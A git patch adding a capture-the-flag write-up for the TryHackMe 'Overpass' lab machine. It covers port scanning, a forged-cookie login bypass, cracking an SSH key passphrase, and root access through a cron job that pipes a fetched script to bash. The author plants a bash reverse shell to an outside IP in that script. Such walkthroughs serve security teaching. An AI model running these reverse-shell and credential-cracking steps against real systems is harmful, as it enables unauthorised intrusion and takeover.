From 89cd7d54068e1bc3c3096b1d4d93ce202917038a Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Wed, 11 Nov 2020 21:24:54 +0500
Subject: [PATCH] Add files via upload
---
TryHackMe/Overpass.md | 165 ++++++++++++++++++++++++++++++++++++++++++
1 file changed, 165 insertions(+)
create mode 100644 TryHackMe/Overpass.md
diff --git a/TryHackMe/Overpass.md b/TryHackMe/Overpass.md
new file mode 100644
index 0000000..d880af8
--- /dev/null
+++ b/TryHackMe/Overpass.md
@@ -0,0 +1,165 @@
+# TryHackMe-Overpass
+
+## NMAP
+
+```
+nmap -sC -sV 10.10.124.118
+Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 22:35 PKT
+Nmap scan report for 10.10.124.118
+Host is up (0.18s latency).
+Not shown: 998 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
+| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
+|_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
+80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
+|_http-title: Overpass
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+```
+
+## PORT 80
+
+
+
+
+
+
+Download the file to see what's in it.
+
+
+
+There's also a source code in`golang` let's see maybe we can find something it in so we can exploit that binary.
+
+
+
+
+## Gobuster
+
+```
+root@kali:~/TryHackMe/Easy/Overpass# gobuster dir -u http://10.10.124.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+===============================================================
+Gobuster v3.0.1
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+===============================================================
+[+] Url: http://10.10.124.118
+[+] Threads: 10
+[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+[+] Status codes: 200,204,301,302,307,401,403
+[+] User Agent: gobuster/3.0.1
+[+] Timeout: 10s
+===============================================================
+2020/11/10 22:50:19 Starting gobuster
+===============================================================
+/img (Status: 301)
+/downloads (Status: 301)
+/aboutus (Status: 301)
+/admin (Status: 301)
+/css (Status: 301)
+```
+We see that there's an `/admin` page
+
+
+
+Looking at the source we can see 3 javascript files , we are interested in `login.js` so let's view the source code
+
+
+
+This is a vulnerabale piece of code that would make authenticate a user with invalid crdentials if he has a session so let's make a fake `SessionToken` with a browser extension named `EditThisCookie`
+
+
+
+
+On refreshing the page we will get the ssh key for `james`
+
+
+
+But it's asking for the passphrase of `id_rsa` so we can get the hash of `id_rsa` with `ssh2john` and crack it with `johntheripper`
+
+```
+root@kali:~/TryHackMe/Easy/Overpass# /usr/share/john/ssh2john.py id_rsa > ssh_hash
+root@kali:~/TryHackMe/Easy/Overpass# john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash
+Using default input encoding: UTF-8
+Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+Cost 2 (iteration count) is 1 for all loaded hashes
+Will run 4 OpenMP threads
+Note: This format may emit false positives, so it will keep trying even after
+finding a possible candidate.
+Press 'q' or Ctrl-C to abort, almost any other key for status
+james13 (id_rsa)
+1g 0:00:00:03 31.13% (ETA: 20:37:40) 0.3125g/s 1444Kp/s 1444Kc/s 1444KC/s play646..play47
+Session aborted
+
+```
+Then `ssh james@ -i id_rsa`
+
+
+
+## Privilege Escalation
+
+Host `linpeas.sh` on local machine and transfer it to target machine
+
+
+I didn't find anythin with linpeas so next thing that I looked at was a file `.overpass` in `james`'s home directroy , reading the content of the file it was gibberish
+
+`,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.`
+
+I visited https://gchq.github.io/CyberChef/
+
+
+
+This password is for `james` but still he is not in group `sudoers`
+
+
+That was a rabbit hole then check for cronjobs
+
+```
+james@overpass-prod:~$ cat /etc/crontab
+# /etc/crontab: system-wide crontab
+# Unlike any other crontab you don't have to run the `crontab'
+# command to install the new version when you edit this file
+# and files in /etc/cron.d. These files also have username fields,
+# that none of the other crontabs do.
+
+SHELL=/bin/sh
+PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
+
+# m h dom mon dow user command
+17 * * * * root cd / && run-parts --report /etc/cron.hourly
+25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
+47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
+52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
+# Update builds from latest code
+* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
+james@overpass-prod:~$
+```
+looking at `/etc/hosts` we can change this localhost to our local machine's address and add a reverse shell in bash with path `/downloads/src/buildscript.sh`
+```
+james@overpass-prod:~$ cat /etc/hosts
+127.0.0.1 localhost
+127.0.1.1 overpass-prod
+127.0.0.1 overpass.thm
+# The following lines are desirable for IPv6 capable hosts
+::1 ip6-localhost ip6-loopback
+fe00::0 ip6-localnet
+ff00::0 ip6-mcastprefix
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+james@overpass-prod:~$
+
+```
+Now making directory `/downloads/src/buildscript.sh`
+
+```
+root@kali:~/TryHackMe/Easy/Overpass# mkdir downloads
+root@kali:~/TryHackMe/Easy/Overpass# cd downloads/
+root@kali:~/TryHackMe/Easy/Overpass/downloads# mkdir src
+root@kali:~/TryHackMe/Easy/Overpass/downloads# echo "bash -i >& /dev/tcp/10.14.3.143/8080 0>&1" > buildscript.sh
+root@kali:~/TryHackMe/Easy/Overpass/downloads# chmod +x buildscript.sh
+```
+
+
+And just like that we will get the reverse shell as `root` !
\ No newline at end of file